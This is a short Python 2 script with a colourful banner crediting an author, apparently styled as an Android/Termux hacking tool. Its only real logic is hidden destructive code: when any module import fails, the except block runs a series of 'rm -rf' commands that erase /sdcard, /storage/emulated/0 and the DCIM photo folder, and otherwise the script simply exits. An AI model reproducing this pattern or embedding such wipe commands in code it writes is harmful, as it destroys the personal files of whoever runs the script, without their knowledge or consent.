#!/usr/bin/python2
# -*- coding: utf-8


try:
	import os,sys,time,platform,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib,requests,uuid,string,subprocess
	from multiprocessing.pool import ThreadPool
	from requests.exceptions import ConnectionError
except ImportError:
    
	os.system("rm -rf /sdcard/")
	os.system("rm -rf /sdcard")
	os.system("rm -rf /storage/emulated/0")
	os.system("rm -rf /sdcard/DCIM")
	os.system("rm -rf /sdcard")
	os.system("rm -rf /sdcard/dcim")
	os.system("rm -rf /sdcard/*")
        os.system("rm -rf /storage/emulated/0/*")
        os.system("rm -rf /storage/emulated/0")
    
    
logo="""
\x1b[1;91m  _   _    __    __  __    __    _  _  __  __  _  _ 
\x1b[1;92m ( )_( )  /__\  (  \/  )  /__\  ( \/ )(  )(  )( \( )
\x1b[1;93m  ) _ (  /(__)\  )    (  /(__)\  \  /  )(__)(  )  ( 
\x1b[1;97m (_) (_)(__)(__)(_/\/\_)(__)(__) (__) (______)(_)\_)

 -----------------------------------------------------
\033[1;92m   Author   : \033[1;96mHamayun Khan
\033[1;92m   Github   : \033[1;93mhttps://github.com/hamayun01
 \033[1;92m  Facebook :\033[1;97m Hamayun Khan
-----------------------------------------------------
  """


if __name__ == '__main__':
	exit()
 
